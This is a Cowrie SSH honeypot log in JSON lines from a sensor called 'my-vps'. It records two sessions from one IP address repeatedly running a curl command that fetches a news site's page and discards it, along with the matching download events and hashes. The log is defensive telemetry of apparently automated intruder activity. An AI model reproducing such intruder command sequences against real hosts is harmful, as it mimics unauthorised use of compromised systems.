{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.611836Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.630342Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.632545Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.635753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.636676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.638722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.639513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.673815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.674826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.677617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.678573Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.681757Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.684721Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.718563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.719697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.722552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.723433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.738944Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.759334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.760290Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.762832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.763734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.802504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.803632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.806070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.809479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.848727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.849850Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.852771Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.853758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.879142Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.880766Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.893510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.894567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.898438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.900057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.901175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.904423Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.908111Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.920163Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.945879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.947089Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.950315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.951460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.993063Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.994130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:26.996959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.997786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:26.999888Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.002593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.014369Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.023681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.026096Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.030044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.031006Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.037680Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.038627Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.069952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.071118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.079330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.080382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.107962Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.109022Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.117012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.118226Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.151694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.152510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.162897Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.164608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.165778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.176908Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.189395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.190865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.202837Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.211816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.212875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.223395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.232292Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.233927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.275826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.277000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.283412Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.284312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.304398Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.313587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.314593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.319811Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.322627Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.323610Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
